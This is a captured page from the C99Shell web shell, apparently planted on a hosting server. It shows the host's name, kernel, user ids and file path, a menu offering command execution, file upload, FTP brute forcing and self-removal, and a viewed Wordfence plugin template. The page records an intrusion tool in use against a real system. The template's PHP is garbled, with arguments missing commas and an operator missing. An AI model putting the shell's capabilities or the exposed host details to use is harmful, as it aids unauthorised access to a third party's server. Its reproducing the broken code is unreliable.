!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.6.40-67+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux hosting1.erectacloud.it 5.4.0-182-generic #202-Ubuntu SMP Fri Apr 26 12:29:36 UTC
2024 x86_64
 

uid=5229(web473) gid=5117(client172) groups=5117(client172),5002(sshusers) 

Safe-mode: OFF (not secure)

/var/www/clients/client172/web473/web/OLD_WP/wp-content/plugins/wordfence/views/scanner/   drwxr-xr-x
Free 179.5 GB of 490.84 GB (36.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     scanner-status.php (3.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents the scanner status.
 *
 * Expects $scanner to be defined.
 *
 * @var wfScanner $scanner The scanner state.
 * @var wfDashboard $dashboard Dashboard statistics.
 */
?>
<ul class="wf-block-list wf-block-list-horizontal">
    <?php if ($scanner->isEnabled() == 'enabled' && $scanner->signatureMode() == wfScanner::SIGNATURE_MODE_PREMIUM): ?>
        <li>
            <div class="wf-block-labeled-value wf-scan-status wf-scan-status-full-enabled">
                <div class="wf-block-labeled-value-label"><?php _e('Wordfence Scan &amp; Premium Enabled''wordfence'); ?></div>
            </div>
        </li>
    <?php else: ?>
        <li>
            <?php if (!$scanner->isEnabled()): ?>
                <div class="wf-scan-status-disabled">
                    <p><h3><?php _e('Wordfence Scan Deactivated''wordfence'); ?></h3></p>
                    <p><?php _e('A Wordfence scan examines all files, posts, pages, and comments on your WordPress website looking for malware, known malicious URLs, and known patterns of infections. It also does several other reputation and server checks.''wordfence'); ?></p>
                    <p>
                        <a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="#" target="_blank" rel="noopener noreferrer" id="wf-scan-top-enable-scans"><?php _e('Enable Automatic Scans''wordfence'); ?></a>
                        <script type="application/javascript">
                            (function($) {
                                $(function() {
                                    $('#wf-scan-top-enable-scans').on('click', function(e) {
                                        e.preventDefault();
                                        e.stopPropagation();

                                        WFAD.setOption('scheduledScansEnabled', 1, function() {
                                            window.location.reload(true);
                                        });
                                    });
                                });
                            })(jQuery);
                        </script>
                    </p>
                </div>
            <?php else: ?>
                <div class="wf-block-labeled-value wf-scan-status wf-scan-status-enabled">
                    <div class="wf-block-labeled-value-value"><i class="wf-fa wf-fa-check" aria-hidden="true"></i></div>
                    <div class="wf-block-labeled-value-label"><?php _e('Wordfence Scan Enabled''wordfence'); ?></div>
                </div>
            <?php endif; ?>
        </li>
        <li>
            <?php if ($scanner->signatureMode() == wfScanner::SIGNATURE_MODE_COMMUNITY): ?>
                <div>
                    <p><h3><?php _e('Premium Protection Disabled''wordfence'); ?></h3></p>
                    <p><?php printf(__('As a free Wordfence user, you are currently using the Community version of the Threat Defense Feed. Premium users are protected by an additional %d firewall rules and malware signatures as well as the Wordfence real-time IP blacklist. Upgrade to Premium today to improve your protection.''wordfence'), ($dashboard->tdfPremium $dashboard->tdfCommunity)); ?></p>
                    <p><a class="wf-btn wf-btn-primary wf-btn-callout-subtle" href="https://www.wordfence.com/gnl1scanUpgrade/wordfence-signup/#premium-order-form" target="_blank" rel="noopener noreferrer"><?php _e('Upgrade to Premium''wordfence'); ?></a>&nbsp;&nbsp;<a class="wf-btn wf-btn-callout-subtle wf-btn-default" href="https://www.wordfence.com/gnl1scanLearn/wordfence-signup/" target="_blank" rel="noopener noreferrer"><?php _e('Learn More''wordfence'); ?></a></p>
                </div>
            <?php else: ?>
                <div class="wf-block-labeled-value wf-protection-status wf-protection-status-<?php echo esc_attr($scanner->signatureMode()); ?>">
                    <div class="wf-block-labeled-value-value"><i class="wf-fa wf-fa-check" aria-hidden="true"></i></div>
                    <div class="wf-block-labeled-value-label"><?php _e('Premium Protection Enabled''wordfence'); ?></div>
                </div>
            <?php endif; ?>
        </li>
    <?php endif; ?>
</ul>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0137 ]--